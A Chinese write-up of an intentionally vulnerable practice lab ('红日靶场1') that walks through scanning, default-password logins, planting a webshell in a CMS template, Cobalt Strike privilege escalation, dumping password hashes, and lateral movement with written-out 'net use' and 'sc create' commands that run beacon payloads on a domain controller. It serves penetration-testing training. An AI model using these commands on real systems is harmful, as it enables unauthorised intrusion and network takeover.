红日靶场1
靶场环境搭建机器名称外网IP(模拟外网)内网IP(模拟内网)攻击机器192.168.142.133Win7机器192.168.142.210192.168.140.210Win Server 2008机器(DC)192.168.140.220Win Server 2003机器192.168.140.230坑点
(1)在Win7机器上打开phpstudy时,第一次会出现报错,需要重启一下Win7机器。
1、通过arp-scan命令和nmap探测C段存活主机
arp-scan -lhttps://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011222602854-492955098.png
nmap 192.168.142.0/24 -sn -sn参数的代表只通过ping探测主机https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011222621518-40380020.png
2、确定目标主机为192.168.142.210,则对其进行端口探测
nmap -sV -Pn 192.168.142.210 -sV代表探测系统版本 -Pn代表跳过主机发现,直接对端口探测https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011222631334-1630925990.png
发现192.168.142.210是开放了80、135、3306端口(存在未授权漏洞),而且是Windows机器,如果想探测详细版本可以通过-O参数。
3、访问web服务寻找突破点。
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011222659733-1383891800.png
(1)探针信息收集
服务器:Win7
服务器主机名:STU1
网站根目录:C:/phpStudy/WWW
管理员邮箱:admin@phpStudy.net(2)发现mysql连接检测
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011222738561-851932184.png
尝试了几个常见密码,用户名:root ,密码:root 成功。
(3)远程连接mysql
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223319393-923302010.png
连接失败。
4、对站点信息收集
(1)目录扫描
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223327015-2070811048.png
(2)发现一个beifen.rar文件,下载查看文件
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223507700-81785067.png
是一个yxcms建站系统。
5、访问http://192.168.142.210/yxcms/
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223528894-1048477603.png
/index.php?r=admin进入后台页面
后台的用户名:admin ,密码:123456
6、登录后台页面
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223538435-1864336645.png
7、发现前台模版中存在很多php文件,创建一个test.php
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223547324-1141946412.png
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223554252-1658987044.png
8、在yxcms文件中去定位test.php的位置
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223601474-1722175959.png
9、访问http://192.168.142.210/yxcms/protected/apps/default/view/default/test.php
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223608655-1091890473.png
解析成功
10、用蚁剑连接拿到webshell
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223616139-1160861931.png
11、进行初步内网信息收集
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223622064-12650697.png
当前权限:stu1\win7
12、上线到CS上进行提权
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223652110-1120939743.png
成功提权
13、信息收集,尝试各种横向移动方式
(1)抓取明文密码和NTLM哈希
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223704545-1770001982.png
administrator用户的密码:admin@123
administrator的LM哈希值:6f08d7b306b1dad4b75e0c8d76954a50
administrator的NTLM哈希值:579da618cfbfa85247acf1f800a280a4
(2)查询主机情况
net viewhttps://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223718359-160026485.png
(3)定位DC机器
shell nslookup -type=SRV _ldap._tcphttps://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223726650-336110271.png
(4)尝试IPC横向移动到DC机器
shell net use \\192.168.140.220\ipc$ "admin@123" /user:administrator
shell dir \\192.168.140.220\c$https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223736035-460960827.png
(5)利用系统服务进行上线
shell copy test.exe \\192.168.140.220\c$
shell sc \\192.168.140.220 create test binpath= "cmd.exe /c c:\test.exe"
shell sc \\192.168.140.220 start test
shell sc \\192.168.140.220 delete testhttps://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223745035-1364860119.png
没有上线,可能是因为内网机器不出网,可以多试几种方法:计划任务上线、PsExec上线
14、CS上线不出网机器的方法
(1)SMB-Beacon上线
(2)TCP-Beacon上线
(3)http代理+端口转发
(4)CS中转技术SMB-Beacon上线
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223752573-108272550.png
成功上线域控。
15、通过域控上线192.168.140.230机器
域控上线后,什么都没做,直接可以远程访问192.168.140.230机器文件
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223803859-684765139.png
上传一个TCP-Beacon木马到192.168.140.230机器
https://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223810663-1018508554.png
16、利用系统服务上线192.168.140.230机器
shell sc \\192.168.140.230 create TCP binpath= "cmd.exe /c c:\TCP.exe"
shell sc \\192.168.140.230 start TCP
shell sc \\192.168.140.230 delete TCPhttps://img2023.cnblogs.com/blog/3135466/202310/3135466-20231011223821334-317792057.png
成功上线。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]